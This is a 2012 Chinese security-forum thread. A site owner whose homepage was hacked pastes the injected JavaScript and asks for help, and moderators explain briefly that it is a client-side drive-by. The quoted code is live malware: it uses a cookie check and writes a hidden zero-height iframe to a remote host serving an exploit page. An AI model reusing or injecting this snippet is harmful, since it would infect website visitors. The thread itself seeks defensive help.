求救:网站被黑恢复后总有代码删不掉,急求解!!! - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 恶意网站交流求救:网站被黑恢复后总有代码删不掉,急求解!!!

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第四十七次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

1 23

3 / 3 页

跳转页

[求助] 求救:网站被黑恢复后总有代码删不掉,急求解!!!

本主题由大版主 networkedition 于 2012-7-10 15:42:11 执行合并主题操作

ying8125 初生襁褓狮帖子:22 注册: 2006-10-25 来自:	发表于： 2012-07-10 14:58 \| 只看楼主短消息资料字号：小中大 21楼能不能帮着分析一下这段木马代码,急! 网站首页总被挂马,这是从挂马的网址里提取的,能不能帮着分析一下,看能不能在服务器上把这个病毒文件找出来删掉以!!跪求!! function baiduuu(){ var Then = new Date() Then.setTime(Then.getTime() + 1260601000) var cookieString = new String(document.cookie) var cookieHeader = "Cookvie1=" var beginPosition = cookieString.indexOf(cookieHeader) if (beginPosition != -1){ } else { var xinsi="yztq"; var fire="<ifra"+"me sr"; document.cookie = "Cookvie1=mikaila;expires="+ Then.toGMTString() document.write("<div style=\'dispaly:none;\' >"); document.write(fire+"c=http:\/\/vni.Jkub.com:89\/2\/niay.htm wid"+"th=100 hei"+"ght=0><\/ifr"+"ame>"); document.write("</div>"); } }baiduuu(); 用户系统信息：Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)*
ying8125 初生襁褓狮帖子:22 注册: 2006-10-25 来自:

networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:	发表于： 2012-07-10 15:05 \| 短消息资料字号：小中大 22楼回复 1F ying8125 的帖子这是通过判断cookie来进行挂马操作啊，并不能通过这段代码找到相应的病毒文件。
networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:

ying8125 初生襁褓狮帖子:22 注册: 2006-10-25 来自:	发表于： 2012-07-10 15:23 \| 只看楼主短消息资料字号：小中大 23楼回复 2F networkedition 的帖子我该怎么在服务器上查找这段代码?清缓存和COOKIE? 您有没有好用的工具可以给推荐一下?谢谢
ying8125 初生襁褓狮帖子:22 注册: 2006-10-25 来自:

networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:	发表于： 2012-07-10 15:33 \| 短消息资料字号：小中大 24楼回复 3F ying8125 的帖子主要是针对客户端的啊
networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:

ying8125 初生襁褓狮帖子:22 注册: 2006-10-25 来自:	发表于： 2012-07-10 15:34 \| 只看楼主短消息资料字号：小中大 25楼回复：能不能帮着分析一下这段木马代码,急! 您是说这个代码不在服务器上?
ying8125 初生襁褓狮帖子:22 注册: 2006-10-25 来自:

ying8125 初生襁褓狮帖子:22 注册: 2006-10-25 来自:	发表于： 2012-07-10 15:34 \| 只看楼主短消息资料字号：小中大 26楼回复：能不能帮着分析一下这段木马代码,急! 要不您加我一下QQ
ying8125 初生襁褓狮帖子:22 注册: 2006-10-25 来自:

ying8125 初生襁褓狮帖子:22 注册: 2006-10-25 来自:	发表于： 2012-07-10 15:35 \| 只看楼主短消息资料字号：小中大 27楼回复：能不能帮着分析一下这段木马代码,急! 我QQ:79978070
ying8125 初生襁褓狮帖子:22 注册: 2006-10-25 来自:

newcenturymoon 社区嘉宾帖子:15158 注册: 2005-08-03 来自:	发表于： 2012-07-10 21:45 \| 短消息资料字号：小中大 28楼回复：求救:网站被黑恢复后总有代码删不掉,急求解!!! 挂的网页代码应该是利用暴雷漏洞的
newcenturymoon 社区嘉宾帖子:15158 注册: 2005-08-03 来自:

<<上一主题|下一主题>>

1 23

3 / 3 页

跳转页

页面顶部

Powered by Discuz!NT